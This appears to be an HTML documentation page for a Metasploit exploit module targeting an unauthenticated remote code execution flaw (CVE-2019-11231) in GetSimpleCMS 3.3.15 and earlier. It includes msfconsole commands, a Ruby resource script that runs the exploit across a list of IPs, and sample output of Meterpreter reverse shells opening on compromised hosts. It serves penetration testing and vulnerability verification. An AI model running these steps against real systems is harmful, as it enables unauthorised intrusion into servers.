<html>
<head>

<script>
  function showOverview() {
    var overview_info_button = document.getElementById('overview_info_button');
    overview_info_button.style.borderColor = "#ccc";
    overview_info_button.style.color = "#333";
    var knowledge_base_button = document.getElementById('knowledge_base_button');
    knowledge_base_button.style.borderColor = "#EEEEEE";
    knowledge_base_button.style.color = "#C4C4C4";
    document.getElementById('knowledge_base').style.display = "none";
    document.getElementById('overview_info').style.display = "inline";
  }

  function showKnowledge() {
    var overview_info_button = document.getElementById('overview_info_button');
    overview_info_button.style.borderColor = "#EEEEEE";
    overview_info_button.style.color = "#C4C4C4";
    var knowledge_base_button = document.getElementById('knowledge_base_button');
    knowledge_base_button.style.borderColor = "#ccc";
    knowledge_base_button.style.color = "#333";
    document.getElementById('overview_info').style.display = "none";
    document.getElementById('knowledge_base').style.display = "inline";
  }

  function initDoc() {
    var kb = document.getElementById('knowledge_base');
    var oi = document.getElementById('overview_info');
    oi.style.display = "none";
    kb.style.display = "inline";

    var kb_button = document.getElementById('knowledge_base_button');
    var oi_button = document.getElementById('overview_info_button');
    kb_button.style.borderColor = "#ccc";
    kb_button.style.color = "#333";
    oi_button.style.borderColor = "#EEEEEE";
    oi_button.style.color = "#C4C4C4";
  }
</script>

<style>
h1, h2, h3, h4, h5, h6, p, blockquote {
    margin: 0;
    padding: 0;
}
body {
    font-family: Arial, "Helvetica Neue", Helvetica, "Hiragino Sans GB", sans-serif;
    font-size: 16px;
    line-height: 18px;
    color: #737373;
    margin: 10px 13px 10px 13px;
}
a {
    color: #0069d6;
}
a:hover {
    color: #0050a3;
    text-decoration: none;
}
a img {
    border: none;
}
p {
    margin-bottom: 16px;
}
h1, h2, h3, h4, h5, h6 {
    color: #404040;
    line-height: 36px;
}
h1 {
    margin-bottom: 18px;
    font-size: 30px;
}
h2 {
    font-size: 24px;
    margin-bottom: 16px;
}
h3 {
    font-size: 18px;
    margin-bottom: 16px;
}
h4 {
    font-size: 16px;
    margin-bottom: 16px;
}
h5 {
    font-size: 16px;
    margin-bottom: 16px;
}
h6 {
    font-size: 13px;
    margin-bottom: 16px;
}
hr {
    margin: 0 0 19px;
    border: 0;
    border-bottom: 1px solid #eee;
}
blockquote {
    padding: 13px 13px 21px 15px;
    margin-bottom: 18px;
    font-family:georgia,serif;
    font-style: italic;
}
blockquote:before {
    content:"\201C";
    font-size:40px;
    margin-left:-10px;
    font-family:georgia,serif;
    color:#eee;
}
blockquote p {
    font-size: 16px;
    font-weight: 300;
    line-height: 18px;
    margin-bottom: 0;
    font-style: italic;
}
code, pre {
    font-family: Monaco, Andale Mono, Courier New, monospace;
}
code {
    background-color: #eee;
    color: rgba(0, 0, 0, 0.75);
    padding: 1px 3px;
    font-size: 13px;
    -webkit-border-radius: 3px;
    -moz-border-radius: 3px;
    border-radius: 3px;
}
pre {
    display: block;
    margin: 0 0 18px;
    line-height: 16px;
    font-size: 13px;
    border: 1px solid #d9d9d9;
    white-space: pre-wrap;
    word-wrap: break-word;
}
pre code {
    background-color: #fff;
    color:#737373;
    font-size: 13px;
    padding: 0;
}
@media screen and (min-width: 768px) {
    body {
        width: 748px;
        margin:10px auto;
    }
}
#overview_info_button {
  font-family:Arial, sans-serif;
  font-size:16px;
  padding:10px 5px;
  border-style:solid;
  border-width:1px;
  border-color:#EEEEEE;
  color:#C4C4C4;
}
#knowledge_base_button {
  font-family:Arial, sans-serif;
  font-size:16px;
  padding:10px 5px;
  border-style:solid;
  border-width:1px;
  border-color:#ccc;
  color:#333;
}
#overview_info_button:hover, #knowledge_base_button:hover {
  cursor: pointer;
}
#long_list {
  height:280px;
  overflow:auto;
  border-style: solid;
  border-width: 1px;
  border-color: #ccc;
}


/*
Description: Foundation 4 docs style for highlight.js
Author: Dan Allen <dan.j.allen@gmail.com>
Website: http://foundation.zurb.com/docs/
Version: 1.0
Date: 2013-04-02
*/

pre code {
  display: block; padding: 0.5em;
  background: #eee;
}

pre .decorator,
pre .annotation {
  color: #000077;
}

pre .attribute {
  color: #070;
}

pre .value,
pre .string,
pre .scss .value .string {
  color: #d14;
}

pre .comment {
  color: #998;
  font-style: italic;
}

pre .function .title {
  color: #900;
}

pre .class {
  color: #458;
}

pre .id,
pre .pseudo,
pre .constant,
pre .hexcolor {
  color: teal;
}

pre .variable {
  color: #336699;
}

pre .javadoc {
  color: #997700;
}

pre .pi,
pre .doctype {
  color: #3344bb;
}

pre .number {
  color: #099;
}

pre .important {
  color: #f00;
}

pre .label {
  color: #970;
}

pre .preprocessor {
  color: #579;
}

pre .reserved,
pre .keyword,
pre .scss .value {
  color: #000;
}

pre .regexp {
  background-color: #fff0ff;
  color: #880088;
}

pre .symbol {
  color: #990073;
}

pre .symbol .string {
  color: #a60;
}

pre .tag {
  color: #007700;
}

pre .at_rule,
pre .at_rule .keyword {
  color: #088;
}

pre .at_rule .preprocessor {
  color: #808;
}

pre .scss .tag,
pre .scss .attribute {
  color: #339;
}
</style>
</head>
<body onload="initDoc()">

<table border="0">
<tr>
<th>
<div id="overview_info_button" onClick="showOverview()">Overview</a>
</th>
<th>
<div id="knowledge_base_button" onClick="showKnowledge()">Knowledge Base</a>
</th>
</tr></table>
<p></p>

<div id="overview_info">
<h2>GetSimpleCMS Unauthenticated RCE</h2><hr>
<p>This module exploits a vulnerability found in GetSimpleCMS, 
which allows unauthenticated attackers to perform Remote 
Code Execution. An arbitrary file upload (PHPcode for 
example) vulnerability can be triggered by an authenticated 
user, however authentication can be bypassed by leaking the 
cms API key to target the session manager.</p>
<h2>Module Name</h2><hr>
<p>exploit/multi/http/getsimplecms_unauth_code_exec</p>
<h2>Authors</h2><hr><ul><li>truerand0m</li>
</ul><h2>Platforms</h2><hr>
<p>php</p>
<h2>Module Ranking</h2><hr>
<p><strong>Excellent</strong></p>

<blockquote>
<p>The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical
memory corruption exploits should be given this ranking unless there are extraordinary circumstances.</p>
</blockquote>
<h2>Module Traits</h2><hr><h2>Related Pull Requests</h2><hr>
<p>GITHUB_OAUTH_TOKEN environment variable not set. <a href="https://help.github.com/articles/creating-an-access-token-for-command-line-use/">See how</a></p>
<h2>AttackerKB references</h2><hr><ul><li><a href="https://attackerkb.com/topics/CVE-2019-11231?referrer=msfconsole">CVE-2019-11231</a></li>
</ul><h2>References</h2><hr><ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11231">CVE-2019-11231</a></li>
<li><a href="https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution">https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution</a></li>
</ul><h2>Available Targets</h2><hr><ul><li>GetSimpleCMS 3.3.15 and before</li>
</ul><h2>Required Options</h2><hr><ul><li><strong>RHOSTS:</strong> The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html</li>
</ul><h2>Basic Usage</h2><hr>
<p><strong>Using getsimplecms_unauth_code_exec against a single host</strong></p>

<p>Normally, you can use exploit/multi/http/getsimplecms_unauth_code_exec this way:</p>
<pre><code>msf &gt; use exploit/multi/http/getsimplecms_unauth_code_exec
msf exploit(getsimplecms_unauth_code_exec) &gt; show targets
    ... a list of targets ...
msf exploit(getsimplecms_unauth_code_exec) &gt; set TARGET target-id
msf exploit(getsimplecms_unauth_code_exec) &gt; show options
    ... show and set options ...
msf exploit(getsimplecms_unauth_code_exec) &gt; exploit
</code></pre>
<p><strong>Using getsimplecms_unauth_code_exec against multiple hosts</strong></p>

<p>But it looks like this is a remote exploit module, which means you can also engage multiple hosts.</p>

<p>First, create a list of IPs you wish to exploit with this module. One IP per line.</p>

<p>Second, set up a background payload listener. This payload should be the same as the one your
getsimplecms_unauth_code_exec will be using:</p>
<ol><li>Do: <code>use exploit/multi/handler</code></li>
<li>Do: <code>set PAYLOAD [payload]</code></li>
<li>Set other options required by the payload</li>
<li>Do: <code>set EXITONSESSION false</code></li>
<li>Do: <code>run -j</code></li>
</ol>
<p>At this point, you should have a payload listening.</p>

<p>Next, create the following script. Notice you will probably need to modify the ip_list path, and
payload options accordingly:</p>
<pre><code>&amp;#x3c;ruby&amp;#x3e;
#
# Modify the path if necessary
#
ip_list = &#39;/tmp/ip_list.txt&#39;

File.open(ip_list, &#39;rb&#39;).each_line do |ip|
  print_status(&quot;Trying against #{ip}&quot;)
  run_single(&quot;use exploit/multi/http/getsimplecms_unauth_code_exec&quot;)
  run_single(&quot;set RHOST #{ip}&quot;)
  run_single(&quot;set DisablePayloadHandler true&quot;)

  #
  # Set a payload that&#39;s the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single(&quot;set PAYLOAD [payload name]&quot;)

  run_single(&quot;run&quot;)
end
&amp;#x3c;/ruby&amp;#x3e;
</code></pre>
<p>Next, run the resource script in the console:</p>
<pre><code>msf &gt; resource [path-to-resource-script]
</code></pre>
<p>And finally, you should see that the exploit is trying against those hosts similar to the following
MS08-067 example:</p>
<pre><code>msf &gt; resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)&gt; Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST =&gt; 192.168.1.80
DisablePayloadHandler =&gt; true
PAYLOAD =&gt; windows/meterpreter/reverse_tcp
LHOST =&gt; 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST =&gt; 192.168.1.109
DisablePayloadHandler =&gt; true
PAYLOAD =&gt; windows/meterpreter/reverse_tcp
LHOST =&gt; 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -&gt; 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -&gt; 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
</code></pre>
</div>

<div id="knowledge_base">
<h2>Description</h2><hr>
<p>This module exploits a vulnerability found in GetSimpleCMS, which
  allows unauthenticated attackers to perform Remote Code Execution.
  An arbitrary file upload vulnerability can be triggered by an
  authenticated user, however authentication can be bypassed by leaking
  the cms API key to target the session manager.</p>
<h2>Vulnerable Application</h2><hr>
<p>GetSimple CMS versions 3.3.15 and below</p>

<p>Vulnerable installations can be found <a href="http://get-simple.info/">here</a></p>
<h2>Verification Steps</h2><hr><ol><li>Install the application</li>
<li>Start msfconsole</li>
<li>Do: <code>use exploit/multi/http/getsimplecms_unauth_code_exec</code></li>
<li>Do: <code>set RHOSTS &lt;IP&gt;</code></li>
<li>Do: <code>run</code></li>
<li>You should get a shell.</li>
</ol><h2>Scenarios</h2><hr><h3>Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04</h3><hr><pre><code>  msf5 &gt; use exploit/multi/http/getsimplecms_unauth_code_exec
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) &gt; set rhosts 192.168.37.137
  rhosts =&gt; 192.168.37.137
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) &gt; set verbose true
  verbose =&gt; true
  msf5 exploit(multi/http/getsimplecms_unauth_code_exec) &gt; run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] GetSimpleCMS version 3315
  [*] Sending stage (38247 bytes) to 192.168.37.137
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -&gt; 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500

  meterpreter &gt; getuid
  Server username: www-data (33)
  meterpreter &gt; sysinfo
  Computer    : ubuntu
  OS          : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
  Meterpreter : php/linux
  meterpreter &gt;
</code></pre>
</div>

</body>
</html>
